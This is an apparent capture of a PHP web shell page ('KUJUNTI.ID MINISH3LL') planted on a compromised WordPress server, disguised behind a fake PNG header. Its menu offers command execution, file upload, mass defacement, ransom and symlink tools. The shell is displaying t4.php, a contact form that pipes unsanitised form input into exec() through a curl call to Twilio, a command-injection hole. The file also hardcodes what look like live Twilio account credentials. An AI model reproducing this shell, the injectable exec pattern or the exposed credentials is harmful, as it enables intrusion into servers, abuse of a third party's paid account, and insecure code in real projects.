\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/ob-wp-eski/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/ob-wp-eski/t4.php


<?php
$action=$_REQUEST['action'];
if ($action=="")    /* display the contact form */
    {

?>
    <form  action="" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="action" value="submit">
    Your name:<br>
    <input name="name" type="text" value="" size="30"/><br>
    Your email:<br>
    <input name="email" type="text" value="" size="30"/><br>
    Your message:<br>
    <textarea name="message" rows="7" cols="30"></textarea><br>
    <input type="submit" value="Send email"/>
    </form>
    <?php
    } 
else                /* send the submitted data */
    {
    $name=$_REQUEST['name'];
    $email=$_REQUEST['email'];
    $message=$_REQUEST['message'];
    if (($name=="")||($email=="")||($message==""))
    {
	    echo "All fields are required, please fill <a href=\"\">the form</a> again.";
	    }
    else{		
           exec( "curl 'https://api.twilio.com/2010-04-01/Accounts/AC95c5254a2556e285aa915411b9307d6f/Messages.json' -X POST \
             --data-urlencode 'To=".+$name."' \
             --data-urlencode 'From=+13612888671' \
             --data-urlencode 'MessagingServiceSid=MGc4abf40ca23e667f3a1394b1e924b992' \
             --data-urlencode 'Body=".rand(1000,9999)."' \
              -u AC95c5254a2556e285aa915411b9307d6f:d67aefbaf52c59fc883af10b6f72909a
");


	    }
    }  
?>
						

© KUJUNTI.ID